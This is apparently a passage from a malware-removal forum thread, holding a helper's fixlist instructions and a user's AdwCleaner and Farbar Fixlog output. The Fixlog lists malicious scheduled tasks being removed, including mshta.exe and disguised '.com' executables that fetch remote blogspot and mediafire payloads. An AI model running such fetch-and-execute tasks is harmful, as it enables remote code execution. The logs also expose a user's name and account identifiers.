2022-03-23 04:55 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\ljesr.e.tmp
2022-03-21 18:35 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\migEyFu.tmp
2022-03-23 08:26 - 2022-03-23 07:55 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\myciaB..tmp
2022-03-21 20:54 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\nGtAkFz.tmp
2022-03-21 16:52 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\oCGeaDq.tmp
2022-03-23 02:58 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pAsnGil.tmp
2022-03-22 17:24 - 2022-03-22 17:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pddmtsw.tmp
2022-03-22 21:30 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pF.Fltn.tmp
2022-03-22 03:00 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\pzvEJ.c.tmp
2022-03-22 05:06 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\qcmJyrv.tmp
2022-03-22 03:05 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\rGHtFCn.tmp
2022-03-22 13:44 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\rGjizBd.tmp
2022-03-21 17:13 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\swhi.Fm.tmp
2022-03-21 22:16 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\tgIysyi.tmp
2022-03-22 07:50 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\u.vBKhg.tmp
2022-03-22 05:50 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\uebnfhx.tmp
2022-03-23 00:14 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\uhhsnBd.tmp
2022-03-23 01:36 - 2022-03-23 01:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\vacfsmG.tmp
2022-03-21 20:37 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\vCkilCq.tmp
2022-03-22 05:30 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\vowws.H.tmp
2022-03-22 10:34 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\x.fkmhm.tmp
2022-03-22 14:12 - 2022-03-22 13:07 - 000069632 _____ () C:\Users\Karin Hostetler\AppData\Roaming\xbfAl.r.tmp
2022-03-22 01:00 - 2022-03-11 20:38 - 000049152 _____ () C:\Users\Karin Hostetler\AppData\Roaming\yc.Kam..tmp
2022-03-22 20:08 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\ymybaBG.tmp
2022-03-22 02:22 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zatwfvJ.tmp
2022-03-22 05:06 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zBllBya.tmp
2022-03-22 01:46 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zIBKqww.tmp
2022-03-21 16:52 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zkKIqmK.tmp
2022-03-22 18:20 - 2022-03-17 08:21 - 000057344 _____ () C:\Users\Karin Hostetler\AppData\Roaming\zmabqBm.tmp
AlternateDataStreams: C:\ProgramData\Temp:AB1A1E3D [742]
SearchScopes: HKU\S-1-5-21-1394640484-365018484-2708498470-1001 -> DefaultScope {B18C6A76-7C50-4965-9A1B-B109B920ADCD} URL =
SearchScopes: HKU\S-1-5-21-1394640484-365018484-2708498470-1001 -> {B18C6A76-7C50-4965-9A1B-B109B920ADCD} URL =
FirewallRules: [UDP Query User{B5A12A77-2103-48C0-B36D-984E39636A68}C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe] => (Allow) C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe => No File
FirewallRules: [TCP Query User{C8669CBA-D698-4654-B81A-2B14A9AB72F3}C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe] => (Allow) C:\users\karin hostetler\appdata\local\liscio\app-1.0.1\liscio.exe => No File
FirewallRules: [UDP Query User{51C5DD6A-E83B-4BC3-ABFC-716A8DF92697}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Block) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File
FirewallRules: [TCP Query User{5B3CB77D-7C8D-4426-AF81-98921AC1C5B4}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Block) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File
FirewallRules: [TCP Query User{05AE48DE-AA5E-4919-80F8-76893F99556E}C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe => No File
FirewallRules: [UDP Query User{F6FCDB82-142B-409C-BF5F-ADE31A08D795}C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2324\g2viewer.exe => No File
FirewallRules: [TCP Query User{5111D219-0C0F-4233-A42C-819264AD54A8}C:\program files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapse.exe => No File
FirewallRules: [UDP Query User{012F3B51-9801-4889-A822-FB8B00F4B624}C:\program files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapse.exe => No File
FirewallRules: [TCP Query User{5111D219-0C0F-4233-A42C-819264AD54A8}C:\program files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapse.exe => No File
FirewallRules: [UDP Query User{012F3B51-9801-4889-A822-FB8B00F4B624}C:\program files (x86)\mobisynapse\mobisynapse.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapse.exe => No File
FirewallRules: [TCP Query User{F907B127-94C2-47D0-9A7E-4B0B9EE01372}C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe => No File
FirewallRules: [UDP Query User{FB10B806-8BB0-4FB9-A223-2B6AEF749C05}C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe] => (Allow) C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe => No File
FirewallRules: [TCP Query User{90C1ECD6-3651-4A40-9E84-086E1F6B159E}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File
FirewallRules: [UDP Query User{CD2CF4D2-6665-4D3B-9AAA-DDBB344E277C}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe] => (Allow) C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe => No File
FirewallRules: [TCP Query User{806E6120-074E-4858-A443-3CCE548E0FDD}C:\program files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla firefox\firefox.exe => No File
FirewallRules: [UDP Query User{93BA9D74-3E49-4A0B-949F-4403A1FD2F07}C:\program files\mozilla firefox\firefox.exe] => (Allow) C:\program files\mozilla firefox\firefox.exe => No File
C:\ProgramData\milon.com
C:\ProgramData\ddond.com
C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision
C:\Users\Karin Hostetler\AppData\Local\mbam
C:\Users\Karin Hostetler\AppData\Local\Temp
C:\ProgramData\Temp
C:\Users\Karin Hostetler\AppData\Roaming\*.tmp
End::
* Click Fix
* When completed the tool will create a log on the desktop called Fixlog.txt.
Please copy and paste the contents of the file in your reply.
===================================================
Things I would like to see in your next reply. Please be sure to copy and paste
any requested log information unless you are asked to attach it.
* Chrome notifications disabled?
* AdwCleaner report
* Fixlog
Gary
"Lord, to whom would we go? You have the words that give eternal life. We
believe, and we know you are the Holy One of God." Where to Start
* Back to top
--------------------------------------------------------------------------------
#5 KTAIT80
ktait80
* Topic Starter
*
* Members
* 30 posts
* ONLINE
* Local time:02:27 PM
Posted 24 March 2022 - 08:54 AM
Chrome notifications have been disabled
AdwCleaner logs"
Adwcleaner[S00]
# -------------------------------
# Malwarebytes AdwCleaner 8.3.1.0
# -------------------------------
# Build: 11-18-2021
# Database: 2022-03-15.3 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 03-24-2022
# Duration: 00:00:43
# OS: Windows 10 Home
# Scanned: 32041
# Detected: 54
***** [ Services ] *****
No malicious services found.
***** [ Folders ] *****
Adware.pokki C:\ProgramData\Host App Service
Adware.pokki C:\Users\Default\AppData\Local\Host App Service
Adware.pokki C:\Users\Karin Hostetler\AppData\Local\Host App
Service
Adware.pokki C:\Users\QBDataServiceUser26\AppData\Local\Host
App Service
Adware.pokki C:\Users\QBDataServiceUser27\AppData\Local\Host
App Service
Adware.pokki C:\Users\QBDataServiceUser28\AppData\Local\Host
App Service
Adware.pokki C:\Users\QBDataServiceUser29\AppData\Local\Host
App Service
Adware.pokki C:\Users\QBDataServiceUser30\AppData\Local\Host
App Service
Adware.pokki C:\Users\QBDataServiceUser31\AppData\Local\Host
App Service
Adware.pokki C:\Users\QBDataServiceUser32\AppData\Local\Host
App Service
Adware.pokki
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Host App Service
Adware.pokki
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Host App Service
PUP.Optional.Legacy C:\Users\Karin
Hostetler\AppData\Roaming\download Manager
***** [ Files ] *****
Adware.pokki C:\Windows\System32\Tasks_Migrated\App Explorer
***** [ DLL ] *****
No malicious DLLs found.
***** [ WMI ] *****
No malicious WMI found.
***** [ Shortcuts ] *****
No malicious shortcuts found.
***** [ Tasks ] *****
Adware.pokki C:\Windows\System32\Tasks\APP EXPLORER
***** [ Registry ] *****
Adware.pokki HKCU\Software\App Host Service
Adware.pokki HKCU\Software\Host App Service
Adware.pokki
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
Adware.pokki HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tasks\{FAA2F9C0-B1F9-43B8-A07F-477CD7F90A6A}
Adware.pokki HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tree\App Explorer
Adware.pokki HKU\S-1-5-19\Software\Host App Service
Adware.pokki
HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App
Service
Adware.pokki HKU\S-1-5-20\Software\Host App Service
Adware.pokki
HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App
Service
Adware.pokki
HKU\S-1-5-21-1394640484-365018484-2708498470-1008\Software\Host App Service
Adware.pokki
HKU\S-1-5-21-1394640484-365018484-2708498470-1008\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host
App Service
Adware.pokki
HKU\S-1-5-21-1394640484-365018484-2708498470-1009\Software\Host App Service
Adware.pokki
HKU\S-1-5-21-1394640484-365018484-2708498470-1009\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host
App Service
Adware.pokki
HKU\S-1-5-21-1394640484-365018484-2708498470-1010\Software\Host App Service
Adware.pokki
HKU\S-1-5-21-1394640484-365018484-2708498470-1010\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host
App Service
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries found.
***** [ Chromium URLs ] *****
No malicious Chromium URLs found.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries found.
***** [ Firefox URLs ] *****
No malicious Firefox URLs found.
***** [ Hosts File Entries ] *****
No malicious hosts file entries found.
***** [ Preinstalled Software ] *****
Preinstalled.HPUsageTrackingLEDM Folder C:\Program Files (x86)\HP\HP UT
LEDM\BIN
Preinstalled.HPUsageTrackingLEDM Registry
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|HPUsageTrackingLEDM
Preinstalled.HPUsageTrackingLEDM Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|HPUsageTrackingLEDM
Preinstalled.HPUsageTrackingLEDM Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{853F464A-B2B8-404E-BA3E-B98FF6862C41}
Preinstalled.LenovoFamilyCloud Folder C:\Program Files\LENOVO\LIVESTORAGE
Preinstalled.LenovoFamilyCloud Folder C:\ProgramData\LENOVO\LIVESTORAGE
Preinstalled.LenovoFamilyCloud Folder C:\Users\Karin
Hostetler\AppData\Local\Temp\LENOVO\LIVESTORAGE
Preinstalled.LenovoFamilyCloud Registry
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{E3573BD4-2C6B-4436-921C-D15B9278A610}
Preinstalled.LenovoFamilyCloud Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{E3573BD4-2C6B-4436-921C-D15B9278A610}
Preinstalled.LenovoIMController Folder C:\ProgramData\LENOVO\IMCONTROLLER
Preinstalled.LenovoIMController Folder C:\Users\Karin
Hostetler\AppData\Local\LENOVO\IMCONTROLLER
Preinstalled.LenovoIMController Folder C:\Windows\LENOVO\IMCONTROLLER
Preinstalled.LenovoIMController Folder
C:\Windows\System32\Tasks\LENOVO\IMCONTROLLER
Preinstalled.LenovoIMController Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\Lenovo
Dependency Package_is1
Preinstalled.LenovoPower2Go Folder C:\Program Files (x86)\LENOVO\POWER2GO
Preinstalled.LenovoPower2Go Folder C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\LENOVO\POWER2GO
Preinstalled.LenovoPower2Go Registry
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|CLMLServer
Preinstalled.LenovoPower2Go Registry
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|UpdateP2GoShortCut
Preinstalled.LenovoPower2Go Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|CLMLServer
Preinstalled.LenovoPower2Go Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|UpdateP2GoShortCut
Preinstalled.LenovoPower2Go Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}
Preinstalled.LenovoPower2Go Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{40BF1E83-20EB-11D8-97C5-0009C5020658}
Preinstalled.LenovoServiceBridge Folder C:\Users\Karin
Hostetler\AppData\Local\PROGRAMS\LENOVO\LENOVO SERVICE BRIDGE
Preinstalled.LenovoServiceBridge Registry
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{2C74547D-EF88-47F4-85F5-BE46A31E26B7}_is1
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########
AdwCleaner[C00]
# -------------------------------
# Malwarebytes AdwCleaner 8.3.1.0
# -------------------------------
# Build: 11-18-2021
# Database: 2022-03-15.3 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 03-24-2022
# Duration: 00:01:16
# OS: Windows 10 Home
# Cleaned: 54
# Awaiting reboot:2
# Failed: 0
***** [ Services ] *****
No malicious services cleaned.
***** [ Folders ] *****
Deleted C:\ProgramData\Host App Service
Deleted C:\Users\Default\AppData\Local\Host App Service
Deleted C:\Users\Karin Hostetler\AppData\Local\Host App Service
Deleted C:\Users\Karin Hostetler\AppData\Roaming\download Manager
Deleted C:\Users\QBDataServiceUser26\AppData\Local\Host App Service
Deleted C:\Users\QBDataServiceUser27\AppData\Local\Host App Service
Deleted C:\Users\QBDataServiceUser28\AppData\Local\Host App Service
Deleted C:\Users\QBDataServiceUser29\AppData\Local\Host App Service
Deleted C:\Users\QBDataServiceUser30\AppData\Local\Host App Service
Deleted C:\Users\QBDataServiceUser31\AppData\Local\Host App Service
Deleted C:\Users\QBDataServiceUser32\AppData\Local\Host App Service
Deleted C:\Windows\ServiceProfiles\LocalService\AppData\Local\Host App
Service
Deleted C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Host App
Service
***** [ Files ] *****
Deleted C:\Windows\System32\Tasks_Migrated\App Explorer
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
Deleted C:\Windows\System32\Tasks\APP EXPLORER
***** [ Registry ] *****
Deleted HKCU\Software\App Host Service
Deleted HKCU\Software\Host App Service
Deleted HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App
Service
Deleted HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tasks\{FAA2F9C0-B1F9-43B8-A07F-477CD7F90A6A}
Deleted HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Schedule\TaskCache\Tree\App Explorer
Deleted HKU\S-1-5-19\Software\Host App Service
Deleted
HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App
Service
Deleted HKU\S-1-5-20\Software\Host App Service
Deleted
HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App
Service
Deleted HKU\S-1-5-21-1394640484-365018484-2708498470-1008\Software\Host
App Service
Deleted
HKU\S-1-5-21-1394640484-365018484-2708498470-1008\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host
App Service
Deleted HKU\S-1-5-21-1394640484-365018484-2708498470-1009\Software\Host
App Service
Deleted
HKU\S-1-5-21-1394640484-365018484-2708498470-1009\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host
App Service
Deleted HKU\S-1-5-21-1394640484-365018484-2708498470-1010\Software\Host
App Service
Deleted
HKU\S-1-5-21-1394640484-365018484-2708498470-1010\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host
App Service
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
No malicious Chromium URLs cleaned.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
***** [ Hosts File Entries ] *****
No malicious hosts file entries cleaned.
***** [ Preinstalled Software ] *****
Deleted Preinstalled.HPUsageTrackingLEDM Folder C:\Program Files
(x86)\HP\HP UT LEDM\BIN
Deleted Preinstalled.HPUsageTrackingLEDM Registry
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|HPUsageTrackingLEDM
Deleted Preinstalled.HPUsageTrackingLEDM Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|HPUsageTrackingLEDM
Deleted Preinstalled.HPUsageTrackingLEDM Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{853F464A-B2B8-404E-BA3E-B98FF6862C41}
Deleted Preinstalled.LenovoFamilyCloud Folder C:\Users\Karin
Hostetler\AppData\Local\Temp\LENOVO\LIVESTORAGE
Deleted Preinstalled.LenovoFamilyCloud Registry
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{E3573BD4-2C6B-4436-921C-D15B9278A610}
Deleted Preinstalled.LenovoFamilyCloud Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{E3573BD4-2C6B-4436-921C-D15B9278A610}
Deleted Preinstalled.LenovoIMController Folder
C:\ProgramData\LENOVO\IMCONTROLLER
Deleted Preinstalled.LenovoIMController Folder C:\Users\Karin
Hostetler\AppData\Local\LENOVO\IMCONTROLLER
Deleted Preinstalled.LenovoIMController Folder
C:\Windows\LENOVO\IMCONTROLLER
Deleted Preinstalled.LenovoIMController Folder
C:\Windows\System32\Tasks\LENOVO\IMCONTROLLER
Deleted Preinstalled.LenovoIMController Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\Lenovo
Dependency Package_is1
Deleted Preinstalled.LenovoPower2Go Folder C:\Program Files
(x86)\LENOVO\POWER2GO
Deleted Preinstalled.LenovoPower2Go Folder
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LENOVO\POWER2GO
Deleted Preinstalled.LenovoPower2Go Registry
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|CLMLServer
Deleted Preinstalled.LenovoPower2Go Registry
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32|UpdateP2GoShortCut
Deleted Preinstalled.LenovoPower2Go Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|CLMLServer
Deleted Preinstalled.LenovoPower2Go Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|UpdateP2GoShortCut
Deleted Preinstalled.LenovoPower2Go Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}
Deleted Preinstalled.LenovoPower2Go Registry
HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{40BF1E83-20EB-11D8-97C5-0009C5020658}
Deleted Preinstalled.LenovoServiceBridge Folder C:\Users\Karin
Hostetler\AppData\Local\PROGRAMS\LENOVO\LENOVO SERVICE BRIDGE
Deleted Preinstalled.LenovoServiceBridge Registry
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{2C74547D-EF88-47F4-85F5-BE46A31E26B7}_is1
Needs Reboot Preinstalled.LenovoFamilyCloud Folder C:\Program
Files\LENOVO\LIVESTORAGE
Needs Reboot Preinstalled.LenovoFamilyCloud Folder
C:\ProgramData\LENOVO\LIVESTORAGE
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
***** Reboot Required to Complete *****
***** [ Folders ] *****
Cleaning failed C:\Program Files\LENOVO\LIVESTORAGE
Cleaning failed C:\ProgramData\LENOVO\LIVESTORAGE
*************************
AdwCleaner[S00].txt - [7144 octets] - [24/03/2022 08:58:48]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
Fixlog
Fix result of Farbar Recovery Scan Tool (x64) Version: 24-03-2022
Ran by Karin Hostetler (24-03-2022 09:38:07) Run:1
Running from C:\Users\Karin Hostetler\Desktop\Delete
Loaded Profiles: Karin Hostetler & QBDataServiceUser27 & QBDataServiceUser26 &
QBDataServiceUser28 & QBDataServiceUser29 & QBDataServiceUser30 &
QBDataServiceUser31 & QBDataServiceUser32
Boot Mode: Normal
==============================================
fixlist content:
*****************
CreateRestorePoint:
CloseProcesses:
Folder: C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision
Folder: C:\Users\Karin Hostetler\AppData\Local\mbam
HKLM-x32\...\Run: [HPUsageTrackingLEDM] => "C:\Program Files (x86)\HP\HP UT
LEDM\bin\hppusg.exe" "C:\Program Files (x86)\HP\HP UT LEDM\" (No File)
HKLM-x32\...\Run: [MobisynapseSyncHelper] => C:\Program Files
(x86)\Mobisynapse\MobisynapseSyncHelper.exe (No File)
HKLM-x32\...\Run: [BYRUA_AGENT] =>
"C:\LGMobileUpgrade\LGMOBILEAX\BYR_Client\VZWUAAgent.exe" -start (No File)
HKLM-x32\...\Run: [DYMOWebApi] => "C:\Program Files (x86)\DYMO\DYMO
Connect\DYMO.WebApi.Win.Host.exe" /auto (No File)
HKLM-x32\...\Run: [DLSService] => "C:\Program Files (x86)\DYMO\DYMO Label
Software\DLSService.exe" (No File)
HKU\S-1-5-21-1394640484-365018484-2708498470-1001\...\Run: [BYRUA_AGENT] =>
"C:\LGMobileUpgrade\LGMOBILEAX\BYR_Client\VZWUAAgent.exe" -start (No File)
Task: {058B7C2A-04F0-45DE-9627-9C6E7CCE7BA8} -
System32\Tasks\asdsdasdjikindasddeyu => "C:\ProgramData\milon.com" [Argument =
"https://mobnew1htmback.blogspot.com/atom.xml"]
Task: {27302AB8-5990-4AC3-BEB6-CF5627D88D26} - System32\Tasks\calendersw =>
"C:\ProgramData\ddond.com" [Argument =
"https://www.mediafire.com/file/b1rg1ah1ulmvcmq/00Back.htm/file"]
Task: {4EBD398E-9E3B-4A48-8FF6-85D216BCAB3C} -
\Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {53FC2A34-956B-4691-8FCB-DA0D66138CBD} -
System32\Tasks\asdaddddasdadsddasdeyu => "C:\Windows\System32\mshta.exe"
"hxxps://mainnewstart1mob.blogspot.com/atom.xml"
Task: {C897E049-5067-41C4-8F4C-CB5C6B419D54} - System32\Tasks\microWord =>
"C:\ProgramData\milon.com" [Argument =
"https://mobnew1htmback.blogspot.com/atom.xml"]
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 =>
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill
[not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 =>
C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer
[not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824
=>
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools
[not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 =>
C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI
[not found]
2022-03-23 08:26 - 2022-03-23 07:55 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\myciaB..tmp
2022-03-23 08:26 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\B.mvKwd.tmp
2022-03-23 07:04 - 2022-03-23 05:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\Fkhvfuv.tmp
2022-03-23 07:04 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\IlxrjIs.tmp
2022-03-23 05:42 - 2022-03-23 05:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.EipzDA.tmp
2022-03-23 05:42 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\FooEDIz.tmp
2022-03-23 04:55 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\ianksBp.tmp
2022-03-23 04:55 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\ljesr.e.tmp
2022-03-23 02:58 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\pAsnGil.tmp
2022-03-23 02:58 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\bvcozKc.tmp
2022-03-23 01:36 - 2022-03-23 01:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\vacfsmG.tmp
2022-03-23 01:36 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\gelfCgB.tmp
2022-03-23 00:14 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.DmrCyx.tmp
2022-03-23 00:14 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\uhhsnBd.tmp
2022-03-22 22:52 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\hdpl.A..tmp
2022-03-22 22:52 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\fhIqKrG.tmp
2022-03-22 21:30 - 2022-03-22 21:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\h.dA..r.tmp
2022-03-22 21:30 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\pF.Fltn.tmp
2022-03-22 20:08 - 2022-03-22 19:54 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\jKsc.Db.tmp
2022-03-22 20:08 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\ymybaBG.tmp
2022-03-22 20:05 - 2022-03-22 19:54 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\abF.FyJ.tmp
2022-03-22 20:05 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
Hostetler\AppData\Roaming\AfKprbo.tmp
2022-03-22 18:46 - 2022-03-22 17:07 - 000069632 _____ C:\Users\Karin
Hostetler\AppData\Roaming\.gq.eEv.tmp
2022-03-22 18:46 - 2022-03-17 08:21 - 000057344 _____ C:\Users\Karin
